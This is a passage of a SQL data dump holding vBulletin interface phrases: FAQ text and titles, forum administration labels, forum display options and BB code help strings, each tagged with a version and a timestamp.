\r\n\r\n\r\nShow Printable Version - this will show you a page with the thread post content in a reduced graphics format that is more \'printer friendly\'. \r\nEmail this Page - if you think the thread may be interesting to someone else, you can forward a link to it to their email address. \r\nSubscribe (or Unsubscribe) from this Thread - by subscribing to a thread, you will receive periodic email updates on recent activity within it. Click here for more information on subscriptions. \r\nAdding a Poll - if you started the thread, you can add a poll to it with this option. Click here for more information on polls. \r\n ', 'vbulletin', 'vBulletin Solutions', 1207317565, '3.7.0 Release Candidate 3'),
(35080, -1, 'vb3_troublesome_users', 'faqtext', 'Can I block posts, emails and messages from specific users?
\r\n\r\nIf there are particular members that bother you and you do not want to see their posts or receive Private Messages and Emails from them, then you can add these members to your \'Ignore List\'. There are several ways to do this:
\r\n\r\nThrough your User Control Panel: User CP , Settings & Options, Edit Ignore List . Then, type their name into the empty text box and click \'Okay\'.
\r\n\r\nWhat if I see something offensive?
\r\n\r\nYou will find \'Report\' links in many places throughout the board. These links allow you to alert the board staff to anything which you find to be offensive, objectionable or illegal.
', 'vbulletin', 'vBulletin Solutions', 1220901022, '3.8.0 Alpha 1'),
(35081, -1, 'vb3_user_cp', 'faqtext', 'The User Control Panel (also known as the User CP) is where you control your personal settings, options and preferences. To visit the User CP, you must have first registered on the forums. Once logged in, click on \'User CP\' in the header bar near the top of the page.
\r\n\r\nThe User CP main page will list any new notifications, including new private messages and pending friend requests. Additional pages and forms allow you to control:
\r\n\r\n\r\nYour email address and password \r\nCustom public profile settings \r\nPrivate messages \r\nSubscribed threads and forums \r\nContacts and friends \r\nSocial groups \r\n ', 'vbulletin', 'vBulletin Solutions', 1207146429, '3.7.0 Release Candidate 3'),
(35082, -1, 'vb3_user_profile', 'faqtext', '', 'vbulletin', 'vBulletin Solutions', 1204554097, '3.7.0 Beta 6'),
(35083, -1, 'vb3_albums', 'faqtitle', 'Albums and Pictures', 'vbulletin', 'vBulletin Solutions', 1204557136, '3.7.0 Beta 6'),
(35084, -1, 'vb3_announcements', 'faqtitle', 'Announcements', 'vbulletin', 'vBulletin Solutions', 1204551344, '3.7.0 Beta 6'),
(35085, -1, 'vb3_attachments', 'faqtitle', 'Attachments and Images', 'vbulletin', 'vBulletin Solutions', 1204566036, '3.7.0 Beta 6'),
(35086, -1, 'vb3_board_faq', 'faqtitle', 'Board FAQ', 'vbulletin', 'vBulletin Solutions', 1204806694, '3.7.0 Beta 6'),
(35087, -1, 'vb3_board_usage', 'faqtitle', 'General Forum Usage', 'vbulletin', 'vBulletin Solutions', 1228216516, '3.8.0 Release Candidate 1'),
(35088, -1, 'vb3_calendar', 'faqtitle', 'Calendars', 'vbulletin', 'vBulletin Solutions', 1204551511, '3.7.0 Beta 6'),
(35089, -1, 'vb3_changing_details', 'faqtitle', 'Changing User Details', 'vbulletin', 'vBulletin Solutions', 1204553874, '3.7.0 Beta 6'),
(35090, -1, 'vb3_contact_members', 'faqtitle', 'Contacting other Members', 'vbulletin', 'vBulletin Solutions', 1204557826, '3.7.0 Beta 6'),
(35091, -1, 'vb3_cookies', 'faqtitle', 'Cookies', 'vbulletin', 'vBulletin Solutions', 1204551478, '3.7.0 Beta 6'),
(35092, -1, 'vb3_editing_deleting', 'faqtitle', 'Editing and Deleting your Posts', 'vbulletin', 'vBulletin Solutions', 1204559380, '3.7.0 Beta 6'),
(35093, -1, 'vb3_forums_threads_posts', 'faqtitle', 'Forums, Threads and Posts', 'vbulletin', 'vBulletin Solutions', 1204566267, '3.7.0 Beta 6'),
(35094, -1, 'vb3_friends_contacts', 'faqtitle', 'Friends and Contacts', 'vbulletin', 'vBulletin Solutions', 1204556826, '3.7.0 Beta 6'),
(35095, -1, 'vb3_lost_passwords', 'faqtitle', 'Lost Passwords', 'vbulletin', 'vBulletin Solutions', 1204551494, '3.7.0 Beta 6'),
(35096, -1, 'vb3_members_list', 'faqtitle', 'Members List', 'vbulletin', 'vBulletin Solutions', 1204565873, '3.7.0 Beta 6'),
(35097, -1, 'vb3_message_icons', 'faqtitle', 'Message Icons and Thread Prefixes', 'vbulletin', 'vBulletin Solutions', 1204553702, '3.7.0 Beta 6'),
(35098, -1, 'vb3_mods_admins', 'faqtitle', 'Moderators and Administrators', 'vbulletin', 'vBulletin Solutions', 1204559411, '3.7.0 Beta 6'),
(35099, -1, 'vb3_new_posts', 'faqtitle', 'Viewing New Posts or Today\'s Posts', 'vbulletin', 'vBulletin Solutions', 1204557689, '3.7.0 Beta 6'),
(35100, -1, 'vb3_notifications', 'faqtitle', 'Your Notifications', 'vbulletin', 'vBulletin Solutions', 1204566343, '3.7.0 Beta 6'),
(35101, -1, 'vb3_other_settings', 'faqtitle', 'Other Settings and Options', 'vbulletin', 'vBulletin Solutions', 1204556807, '3.7.0 Beta 6'),
(35102, -1, 'vb3_polls', 'faqtitle', 'Creating and Participating in Polls', 'vbulletin', 'vBulletin Solutions', 1204552685, '3.7.0 Beta 6'),
(35103, -1, 'vb3_posting', 'faqtitle', 'Posting New Messages', 'vbulletin', 'vBulletin Solutions', 1204804551, '3.7.0 Beta 6'),
(35104, -1, 'vb3_private_messages', 'faqtitle', 'Private Messages', 'vbulletin', 'vBulletin Solutions', 1204553944, '3.7.0 Beta 6'),
(35105, -1, 'vb3_profile_custom', 'faqtitle', 'Profile Page Customization', 'vbulletin', 'vBulletin Solutions', 1204566004, '3.7.0 Beta 6'),
(35106, -1, 'vb3_public_profile', 'faqtitle', 'My Public Profile', 'vbulletin', 'vBulletin Solutions', 1204565979, '3.7.0 Beta 6'),
(35107, -1, 'vb3_quick_links', 'faqtitle', 'Quick Links', 'vbulletin', 'vBulletin Solutions', 1204551562, '3.7.0 Beta 6'),
(35108, -1, 'vb3_rating_threads', 'faqtitle', 'Rating Threads', 'vbulletin', 'vBulletin Solutions', 1204551428, '3.7.0 Beta 6'),
(35109, -1, 'vb3_reading_posting', 'faqtitle', 'Reading and Posting Messages', 'vbulletin', 'vBulletin Solutions', 1204552547, '3.7.0 Beta 6'),
(35110, -1, 'vb3_register', 'faqtitle', 'Registration', 'vbulletin', 'vBulletin Solutions', 1204551275, '3.7.0 Beta 6'),
(35111, -1, 'vb3_replying', 'faqtitle', 'Replying to a Post', 'vbulletin', 'vBulletin Solutions', 1208717872, '3.7.0 Release Candidate 4'),
(35112, -1, 'vb3_reputation', 'faqtitle', 'Reputation', 'vbulletin', 'vBulletin Solutions', 1204552519, '3.7.0 Beta 6'),
(35113, -1, 'vb3_rss_podcasting', 'faqtitle', 'RSS and Podcasting', 'vbulletin', 'vBulletin Solutions', 1204557897, '3.7.0 Beta 6'),
(35114, -1, 'vb3_search', 'faqtitle', 'Searching Forums and Threads', 'vbulletin', 'vBulletin Solutions', 1204565825, '3.7.0 Beta 6'),
(35115, -1, 'vb3_signatures_avatars', 'faqtitle', 'Signatures, Avatars and Profile Pictures', 'vbulletin', 'vBulletin Solutions', 1204553831, '3.7.0 Beta 6'),
(35116, -1, 'vb3_smilies', 'faqtitle', 'Smilies', 'vbulletin', 'vBulletin Solutions', 1204559402, '3.7.0 Beta 6'),
(35117, -1, 'vb3_social_groups', 'faqtitle', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1204566425, '3.7.0 Beta 6'),
(35118, -1, 'vb3_subscriptions', 'faqtitle', 'Subscriptions', 'vbulletin', 'vBulletin Solutions', 1204557173, '3.7.0 Beta 6'),
(35119, -1, 'vb3_tags', 'faqtitle', 'Tags', 'vbulletin', 'vBulletin Solutions', 1204551462, '3.7.0 Beta 6'),
(35120, -1, 'vb3_thread_display', 'faqtitle', 'Thread Display Options', 'vbulletin', 'vBulletin Solutions', 1248797392, '3.8.3'),
(35121, -1, 'vb3_thread_tools', 'faqtitle', 'Thread Tools', 'vbulletin', 'vBulletin Solutions', 1204551446, '3.7.0 Beta 6'),
(35122, -1, 'vb3_troublesome_users', 'faqtitle', 'Dealing with Troublesome Users', 'vbulletin', 'vBulletin Solutions', 1204557885, '3.7.0 Beta 6'),
(35123, -1, 'vb3_user_cp', 'faqtitle', 'The User Control Panel', 'vbulletin', 'vBulletin Solutions', 1204551823, '3.7.0 Beta 6'),
(35124, -1, 'vb3_user_profile', 'faqtitle', 'User Profile Features', 'vbulletin', 'vBulletin Solutions', 1204554097, '3.7.0 Beta 6'),
(35125, -1, 'access_options', 'forum', 'Access Options', 'vbulletin', '', 0, ''),
(35126, -1, 'act_as_forum', 'forum', 'Act as Forum (Will act as category if no) ', 'vbulletin', '', 0, ''),
(35127, -1, 'add_announcement', 'forum', 'Add Announcement', 'vbulletin', '', 0, ''),
(35128, -1, 'add_child_forum', 'forum', 'Add Child Forum', 'vbulletin', '', 0, ''),
(35129, -1, 'add_moderator', 'forum', 'Add Moderator', 'vbulletin', '', 0, ''),
(35130, -1, 'add_new_forum', 'forum', 'Add New Forum', 'vbulletin', '', 0, ''),
(35131, -1, 'allow_icons', 'forum', 'Allow Post Icons', 'vbulletin', '', 0, ''),
(35132, -1, 'allow_thread_ratings_in_this_forum', 'forum', 'Allow Thread Ratings in this Forum', 'vbulletin', '', 0, ''),
(35133, -1, 'apply_password_to_children', 'forum', 'Apply This Password to Child Forums (Only if changed) ', 'vbulletin', '', 0, ''),
(35134, -1, 'are_you_sure_want_to_delete_forum_x', 'forum', 'Are you sure you want to delete the forum called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(35135, -1, 'are_you_sure_you_want_to_delete_this_forum', 'forum', 'Are you sure you want to delete this forum? Note that any sub-forums will also be deleted!', 'vbulletin', '', 0, ''),
(35136, -1, 'can_have_password', 'forum', 'Can Have Password (Setting this to no will prevent a password from being inherited and from being set by moderators) (Note: You may still set a password manually) ', 'vbulletin', '', 0, ''),
(35137, -1, 'category', 'forum', 'Category', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35138, -1, 'count_posts_in_forum', 'forum', 'Count Posts Made in this Forum Towards User Post Counts', 'vbulletin', '', 0, ''),
(35139, -1, 'create_forum_based_off_of_forum', 'forum', 'Create Forum Based off of Forum:', 'vbulletin', '', 0, ''),
(35140, -1, 'custom_forum_style', 'forum', 'Custom Style for this Forum', 'vbulletin', '', 0, ''),
(35141, -1, 'default_sort_field', 'forum', 'Default Sort Field', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35142, -1, 'default_sort_order', 'forum', 'Default Sort Order', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35143, -1, 'delete_forum', 'forum', 'Delete Forum', 'vbulletin', '', 0, ''),
(35144, -1, 'do_not_change_usergroup', 'forum', 'DO NOT CHANGE USERGROUP', 'vbulletin', '', 0, ''),
(35145, -1, 'edit_display_order', 'forum', 'Edit Display Order', 'vbulletin', '', 0, ''),
(35146, -1, 'edit_forum', 'forum', 'Edit Forum', 'vbulletin', '', 0, ''),
(35147, -1, 'edit_password', 'forum', 'Edit Password', 'vbulletin', '', 0, ''),
(35148, -1, 'emails_to_notify_when_post', 'forum', 'Email Addresses to Notify When there is a New Post (Separate each address with a SPACE) ', 'vbulletin', '', 0, ''),
(35149, -1, 'emails_to_notify_when_thread', 'forum', 'Email Addresses to Notify When there is a New Thread (Separate each address with a SPACE) ', 'vbulletin', '', 0, ''),
(35150, -1, 'empty_forums', 'forum', 'Empty Forums', 'vbulletin', '', 0, ''),
(35151, -1, 'expand', 'forum', 'Expand', 'vbulletin', '', 0, ''),
(35152, -1, 'explicit', 'forum', 'Explicit', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35153, -1, 'forum_is_active', 'forum', 'Forum is Active (Will not appear if set to no, but remains accessible if the forum\'s URL is known) ', 'vbulletin', '', 0, ''),
(35154, -1, 'forum_link', 'forum', 'Forum Link (Entering a URL here will cause anyone clicking the forum link to be redirected to that URL) ', 'vbulletin', '', 0, ''),
(35155, -1, 'forum_manager', 'forum', 'Forum Manager', 'vbulletin', '', 0, ''),
(35156, -1, 'forum_open', 'forum', 'Forum is Open (Set this to \'No\' to prevent any new posts being made in this forum) ', 'vbulletin', '', 0, ''),
(35157, -1, 'forum_password', 'forum', 'Forum Password (Optional: This acts in addition to any other permissions set for this forum) ', 'vbulletin', '', 0, ''),
(35158, -1, 'forums_marked_asterisk_are_password_protected', 'forum', 'Forums Marked * are Password-Protected', 'vbulletin', '', 0, ''),
(35159, -1, 'image_url', 'forum', 'Image URLMinimum 300x300. Must be .jpg or .png ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35160, -1, 'index_new_posts', 'forum', 'Index New Posts in Search Engine (Setting this to \'No\' will prevent anyone from being able to search in this forum) ', 'vbulletin', '', 0, ''),
(35161, -1, 'keywords', 'forum', 'KeywordsSeparate with commas ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35162, -1, 'link', 'forum', 'Link', 'vbulletin', '', 0, ''),
(35163, -1, 'list_moderators', 'forum', 'List Moderators', 'vbulletin', '', 0, ''),
(35164, -1, 'media_author', 'forum', 'Media Author', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35165, -1, 'moderate_attachments', 'forum', 'Moderate Attachments', 'vbulletin', '', 0, ''),
(35166, -1, 'moderate_posts', 'forum', 'Moderate Posts', 'vbulletin', '', 0, ''),
(35167, -1, 'moderate_threads', 'forum', 'Moderate Threads', 'vbulletin', '', 0, ''),
(35168, -1, 'moderation_options', 'forum', 'Moderation Options', 'vbulletin', '', 0, ''),
(35169, -1, 'override_style_choice', 'forum', 'Override Users\' Style Choice (If this forum uses a custom style, this will force users with a different style choice to see the forum with the style you specified) ', 'vbulletin', 'vBulletin Solutions', 1185224495, '3.6.8'),
(35170, -1, 'owner_email', 'forum', 'Owner Email', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35171, -1, 'owner_name', 'forum', 'Owner Name', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35172, -1, 'pda', 'forum', 'PDA', 'vbulletin', '', 0, ''),
(35173, -1, 'please_select_forum', 'forum', 'Please select a forum', 'vbulletin', '', 0, ''),
(35174, -1, 'podcast_settings', 'forum', 'Podcast Settings', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35175, -1, 'posting_options', 'forum', 'Posting Options', 'vbulletin', '', 0, ''),
(35176, -1, 'prefix_for_forum_status_images', 'forum', 'Prefix for Forum Status Images\r\n(This prefix will be used on status image filenames for a forum, it can only contain A-Z, 0-9, -, _, . and / ) ', 'vbulletin', 'vBulletin Solutions', 1213632199, '3.8.0 Alpha 1'),
(35177, -1, 'require_moderator_validation_before_new_attachments_are_displayed', 'forum', 'Require moderator validation before new attachments are displayed', 'vbulletin', '', 0, ''),
(35178, -1, 'require_moderator_validation_before_new_posts_are_displayed', 'forum', 'Require moderator validation before new posts are displayed', 'vbulletin', '', 0, ''),
(35179, -1, 'require_moderator_validation_before_new_threads_are_displayed', 'forum', 'Require moderator validation before new threads are displayed', 'vbulletin', '', 0, ''),
(35180, -1, 'require_threads_have_prefix', 'forum', 'Require Threads to have a Prefix', 'vbulletin', 'vBulletin Solutions', 1190043626, '3.7.0 Beta 1'),
(35181, -1, 'show_all_threads', 'forum', 'Show all threads', 'vbulletin', '', 0, ''),
(35182, -1, 'show_forum_on_forum_jump', 'forum', 'Show this Forum and Child Forums on the Forum Jump Menu', 'vbulletin', '', 0, ''),
(35183, -1, 'show_private_forum', 'forum', 'Show Private Forum(Select \'No\' here to hide this forum from users who are not allowed to access it. Users who do have permission to access it will have to log in before they can see this forum. This option applies to any forum listing, including the Forum Jump menu, and Search Results. Selecting \'Use default\' will use the system default as defined in Forum Listings Display Options.) ', 'vbulletin', 'vBulletin Solutions', 1194862893, '3.7.0 Beta 1'),
(35184, -1, 'style_options', 'forum', 'Style Options', 'vbulletin', '', 0, ''),
(35185, -1, 'subtitle', 'forum', 'Subtitle', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35186, -1, 'summary', 'forum', 'Summary', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35187, -1, 'use_default', 'forum', 'Use Default', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35188, -1, 'use_default_style', 'forum', 'Use Default Style', 'vbulletin', '', 0, ''),
(35189, -1, 'use_selected_prefix_sets', 'forum', 'Use Selected Prefix Sets', 'vbulletin', 'vBulletin Solutions', 1190043606, '3.7.0 Beta 1'),
(35190, -1, 'view_forum', 'forum', 'View Forum', 'vbulletin', '', 0, ''),
(35191, -1, 'view_full_version', 'forum', 'View Full Version', 'vbulletin', '', 0, ''),
(35192, -1, 'view_permissions', 'forum', 'View Permissions', 'vbulletin', '', 0, ''),
(35193, -1, 'x_replies', 'forum', '{1} replies', 'vbulletin', '', 0, ''),
(35194, -1, 'yes_display_post_counts', 'forum', 'Yes - Display Post Counts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35195, -1, 'yes_hide_post_counts', 'forum', 'Yes - Hide Post Counts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35196, -1, 'add_moderator', 'forumdisplay', 'Add Moderator', 'vbulletin', '', 0, ''),
(35197, -1, 'admin_tools', 'forumdisplay', 'Admin Tools', 'vbulletin', 'vBulletin Solutions', 1147889553, '3.6.0 Beta 1'),
(35198, -1, 'ascending', 'forumdisplay', 'Ascending', 'vbulletin', '', 0, ''),
(35199, -1, 'beginning', 'forumdisplay', 'Beginning', 'vbulletin', '', 0, ''),
(35200, -1, 'descending', 'forumdisplay', 'Descending', 'vbulletin', '', 0, ''),
(35201, -1, 'expires_on_x_y', 'forumdisplay', 'Expires on {1} at {2}', 'vbulletin', 'vBulletin Solutions', 1151452217, '3.6.0 Beta 4'),
(35202, -1, 'forum_tools', 'forumdisplay', 'Forum Tools', 'vbulletin', '', 0, ''),
(35203, -1, 'from_the', 'forumdisplay', 'From The', 'vbulletin', '', 0, ''),
(35204, -1, 'hot_thread_with_new_posts', 'forumdisplay', 'Hot thread with new posts', 'vbulletin', '', 0, ''),
(35205, -1, 'hot_thread_with_no_new_posts', 'forumdisplay', 'Hot thread with no new posts', 'vbulletin', '', 0, ''),
(35206, -1, 'last_100_days', 'forumdisplay', 'Last 100 Days', 'vbulletin', '', 0, ''),
(35207, -1, 'last_10_days', 'forumdisplay', 'Last 10 Days', 'vbulletin', '', 0, ''),
(35208, -1, 'last_2_days', 'forumdisplay', 'Last 2 Days', 'vbulletin', '', 0, ''),
(35209, -1, 'last_2_months', 'forumdisplay', 'Last 2 Months', 'vbulletin', '', 0, ''),
(35210, -1, 'last_2_weeks', 'forumdisplay', 'Last 2 Weeks', 'vbulletin', '', 0, ''),
(35211, -1, 'last_45_days', 'forumdisplay', 'Last 45 Days', 'vbulletin', '', 0, ''),
(35212, -1, 'last_75_days', 'forumdisplay', 'Last 75 Days', 'vbulletin', '', 0, ''),
(35213, -1, 'last_day', 'forumdisplay', 'Last Day', 'vbulletin', '', 0, ''),
(35214, -1, 'last_month', 'forumdisplay', 'Last Month', 'vbulletin', '', 0, ''),
(35215, -1, 'last_post_time', 'forumdisplay', 'Last Post Time', 'vbulletin', '', 0, ''),
(35216, -1, 'last_week', 'forumdisplay', 'Last Week', 'vbulletin', '', 0, ''),
(35217, -1, 'last_year', 'forumdisplay', 'Last Year', 'vbulletin', '', 0, ''),
(35218, -1, 'mark_this_forum_read', 'forumdisplay', 'Mark This Forum Read', 'vbulletin', '', 0, ''),
(35219, -1, 'mass_move', 'forumdisplay', 'Mass Move', 'vbulletin', '', 0, ''),
(35220, -1, 'mass_prune', 'forumdisplay', 'Mass Prune', 'vbulletin', '', 0, ''),
(35221, -1, 'massmove_threads', 'forumdisplay', 'Mass-Move Threads', 'vbulletin', '', 0, ''),
(35222, -1, 'massprune_threads', 'forumdisplay', 'Mass-Prune Threads', 'vbulletin', '', 0, ''),
(35223, -1, 'moderation', 'forumdisplay', 'Moderation', 'vbulletin', '', 0, ''),
(35224, -1, 'no_posts_in_this_forum', 'forumdisplay', 'There are no posts in this forum.', 'vbulletin', '', 0, ''),
(35225, -1, 'no_posts_last_x_days_forum', 'forumdisplay', 'There have been no posts in the last {1} days in this forum.', 'vbulletin', '', 0, ''),
(35226, -1, 'post_a_new_thread', 'forumdisplay', 'Post a New Thread', 'vbulletin', '', 0, ''),
(35227, -1, 'post_new_announcement', 'forumdisplay', 'Post New Announcement', 'vbulletin', 'vBulletin Solutions', 1142640752, '3.6.0 Beta 1'),
(35228, -1, 'post_new_thread', 'forumdisplay', 'Post New Thread', 'vbulletin', '', 0, ''),
(35229, -1, 'rating', 'forumdisplay', 'Rating', 'vbulletin', '', 0, ''),
(35230, -1, 'search_this_forum', 'forumdisplay', 'Search this Forum', 'vbulletin', '', 0, ''),
(35231, -1, 'showing_threads_x_to_y_of_z', 'forumdisplay', 'Showing threads {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925305, '3.7.0 Release Candidate 1'),
(35232, -1, 'sort_order', 'forumdisplay', 'Sort Order', 'vbulletin', '', 0, ''),
(35233, -1, 'sort_threads_by', 'forumdisplay', 'Sort threads by', 'vbulletin', 'vBulletin Solutions', 1248394357, '3.8.3'),
(35234, -1, 'sorted_by', 'forumdisplay', 'Sorted By', 'vbulletin', '', 0, ''),
(35235, -1, 'subscribe_to_this_forum', 'forumdisplay', 'Subscribe to This Forum', 'vbulletin', '', 0, ''),
(35236, -1, 'thread_contains_a_message_written_by_you', 'forumdisplay', 'Thread Contains a Message Written By You', 'vbulletin', '', 0, ''),
(35237, -1, 'thread_is_closed', 'forumdisplay', 'Thread is closed', 'vbulletin', '', 0, ''),
(35238, -1, 'thread_rating', 'forumdisplay', 'Thread Rating', 'vbulletin', '', 0, ''),
(35239, -1, 'thread_start_time', 'forumdisplay', 'Thread Start Time', 'vbulletin', 'vBulletin Solutions', 1149205117, '3.6.0 Beta 1'),
(35240, -1, 'thread_title', 'forumdisplay', 'Thread Title', 'vbulletin', '', 0, ''),
(35241, -1, 'threads_in_forum', 'forumdisplay', 'Threads in Forum', 'vbulletin', '', 0, ''),
(35242, -1, 'try_controls_below_for_older_pictures', 'forumdisplay', 'Try using the controls below to search for any older pictures that may exist.', 'vbulletin', 'vBulletin Solutions', 1213611360, '3.8.0 Alpha 1'),
(35243, -1, 'try_controls_below_for_older_posts', 'forumdisplay', 'Try using the controls below to search for any older posts that may exist.', 'vbulletin', '', 0, ''),
(35244, -1, 'view_attachment_queue', 'forumdisplay', 'View Attachment Queue', 'vbulletin', '', 0, ''),
(35245, -1, 'view_parent_forum', 'forumdisplay', 'View Parent Forum', 'vbulletin', '', 0, ''),
(35246, -1, 'view_posts_queue', 'forumdisplay', 'View Posts Queue', 'vbulletin', '', 0, ''),
(35247, -1, 'x_deleted_posts', 'forumdisplay', '{1} Deleted Post(s)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35248, -1, 'x_members_y_guests', 'forumdisplay', '{1} members & {2} guests', 'vbulletin', '', 0, ''),
(35249, -1, 'x_moderated_posts', 'forumdisplay', '{1} Moderated Post(s)', 'vbulletin', '', 0, ''),
(35250, -1, 'you_have_posted_in_this_thread', 'forumdisplay', 'You have posted in this thread', 'vbulletin', '', 0, ''),
(35251, -1, 'advanced_lists', 'fronthelp', 'Advanced Lists', 'vbulletin', '', 0, ''),
(35252, -1, 'attach_tag_allows', 'fronthelp', 'The [attach] tag allows you to display an attachment in your post rather than at the bottom. It will only display attachments that belong to the post in which it is utilized.', 'vbulletin', '', 0, ''),
(35253, -1, 'attachmentid', 'fronthelp', 'attachmentid', 'vbulletin', '', 0, ''),
(35254, -1, 'avatar_list', 'fronthelp', 'Avatar List', 'vbulletin', '', 0, ''),
(35255, -1, 'avatars', 'fronthelp', 'Avatars', 'vbulletin', '', 0, ''),
(35256, -1, 'avatars_small_images', 'fronthelp', 'Avatars are small graphical images that you may choose in your profile.\r\n They are displayed by your username on all posts that you make.\r\n You can select the image that best describes yourself from your profile options.', 'vbulletin', '', 0, ''),
(35257, -1, 'b_i_and_u_tags_allow', 'fronthelp', 'The [b], [i] and [u] tags allow you to create text that is bold, italic and underlined.', 'vbulletin', '', 0, ''),
(35258, -1, 'bb_code', 'fronthelp', 'BB Code', 'vbulletin', 'vBulletin Solutions', 1206965085, '3.7.0 Release Candidate 2'),
(35259, -1, 'bb_code_based_on_html', 'fronthelp', 'BB code is a set of tags based on the HTML language that you may already be familiar with.\r\n They allow you to add formatting to your messages in the same way as HTML does,\r\n but have a simpler syntax and will never break the layout of the pages you are viewing.\r\n The ability to use BB code is set on a forum-by-forum basis by the administrator,\r\n so you should check the forum rules when you post a new message. \r\n \r\n Below is a list of the BB code tags you can use to format your messages.', 'vbulletin', 'vBulletin Solutions', 1206965118, '3.7.0 Release Candidate 2'),
(35260, -1, 'bbcode_list', 'fronthelp', 'BB Code List', 'vbulletin', 'vBulletin Solutions', 1195819636, '3.7.0 Beta 1'),
(35261, -1, 'bold', 'fronthelp', 'Bold', 'vbulletin', '', 0, ''),
(35262, -1, 'bulleted_lists', 'fronthelp', 'Bulleted Lists', 'vbulletin', '', 0, ''),
(35263, -1, 'center', 'fronthelp', 'Center', 'vbulletin', '', 0, ''),
(35264, -1, 'click_here_to_email_me', 'fronthelp', 'Click Here to Email Me', 'vbulletin', '', 0, ''),
(35265, -1, 'click_me', 'fronthelp', 'Click Me!', 'vbulletin', '', 0, ''),
(35266, -1, 'code_tag_switches', 'fronthelp', 'The [code] tag switches to a fixed-width (monospace) font and preserves all spacing.', 'vbulletin', '', 0, ''),
(35267, -1, 'color', 'fronthelp', 'Color', 'vbulletin', '', 0, ''),
(35268, -1, 'color_tag_allows', 'fronthelp', 'The [color] tag allows you to change the color of your text.', 'vbulletin', '', 0, ''),
(35269, -1, 'email_linking', 'fronthelp', 'Email Linking', 'vbulletin', '', 0, ''),
(35270, -1, 'email_tag_allows', 'fronthelp', 'The [email] tag allows you to link to an email address. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''),
(35271, -1, 'example_output', 'fronthelp', 'Example Output', 'vbulletin', '', 0, ''),
(35272, -1, 'example_usage', 'fronthelp', 'Example Usage', 'vbulletin', '', 0, ''),
(35273, -1, 'faq_item', 'fronthelp', 'FAQ Item', 'vbulletin', '', 0, ''),
(35274, -1, 'font', 'fronthelp', 'Font', 'vbulletin', '', 0, ''),
(35275, -1, 'font_tag_allows', 'fronthelp', 'The [font] tag allows you to change the font of your text.', 'vbulletin', '', 0, ''),
(35276, -1, 'highlight', 'fronthelp', 'Highlight', 'vbulletin', '', 0, ''),
(35277, -1, 'highlight_tag_allows', 'fronthelp', 'The [highlight] tag allows you to emphasize your text.', 'vbulletin', '', 0, ''),
(35278, -1, 'html_tag_allows', 'fronthelp', 'The [html] tag allows you to perform syntax highlighting for HTML code.', 'vbulletin', '', 0, ''),
(35279, -1, 'images', 'fronthelp', 'Images', 'vbulletin', '', 0, ''),
(35280, -1, 'img_tag_allows', 'fronthelp', 'The [img] tag allows you to embed images within your posts. You can also combine this tag with the [url] tag to make images become links.', 'vbulletin', '', 0, ''),
(35281, -1, 'incorrect_bb_code_usage', 'fronthelp', 'Incorrect BB Code Usage: \r\n \r\n [url] www.example.com [/url] - don\'t put spaces between the bracketed code and the text you are applying the code to. \r\n [email] myname@domain.com[email] - the end brackets must include a forward slash ([/email] ) \r\n ', 'vbulletin', 'vBulletin Solutions', 1206971125, '3.7.0 Release Candidate 2'),
(35282, -1, 'indent', 'fronthelp', 'Indent', 'vbulletin', '', 0, ''),
(35283, -1, 'indent_tag_allows', 'fronthelp', 'The [indent] tag allows you to indent your text.', 'vbulletin', '', 0, ''),
(35284, -1, 'italic', 'fronthelp', 'Italic', 'vbulletin', '', 0, ''),
(35285, -1, 'left', 'fronthelp', 'Left', 'vbulletin', '', 0, ''),
(35286, -1, 'left_right_and_center_tags_allow', 'fronthelp', 'The [left], [right] and [center] tags allow you to change the alignment of your text.', 'vbulletin', '', 0, ''),
(35287, -1, 'linked', 'fronthelp', 'Linked', 'vbulletin', '', 0, ''),
(35288, -1, 'list_item_1', 'fronthelp', 'list item 1', 'vbulletin', '', 0, ''),
(35289, -1, 'list_item_2', 'fronthelp', 'list item 2', 'vbulletin', '', 0, ''),
(35290, -1, 'list_tag_allows', 'fronthelp', 'The [list] tag allows you to create simple, bulleted lists without specifying an option. Within the value portion, each bullet is denoted by the [*] tag.', 'vbulletin', '', 0, ''),
(35291, -1, 'list_tag_allows_advanced', 'fronthelp', 'The [list] tag allows you to create advanced lists by specifying an option. The option should have a value of 1 (for a numbered list) or A (for an alphabetic with capital letters list) or a (for an alphabetic with lowercase letters list) or I (for a numbered with capital Roman numeral list) or i (for a numbered with small Roman numeral list).', 'vbulletin', '', 0, ''),
(35292, -1, 'match_all_words', 'fronthelp', 'Match All Words', 'vbulletin', '', 0, ''),
(35293, -1, 'match_any_words', 'fronthelp', 'Match Any Words', 'vbulletin', '', 0, ''),
(35294, -1, 'match_complete_phrase', 'fronthelp', 'Match Complete Phrase', 'vbulletin', '', 0, ''),
(35295, -1, 'matching_options', 'fronthelp', 'Matching Options', 'vbulletin', '', 0, ''),
(35296, -1, 'meaning', 'fronthelp', 'Meaning', 'vbulletin', '', 0, ''),
(35297, -1, 'no_predefined_avatars_available', 'fronthelp', 'There are no pre-defined avatars available.', 'vbulletin', '', 0, ''),
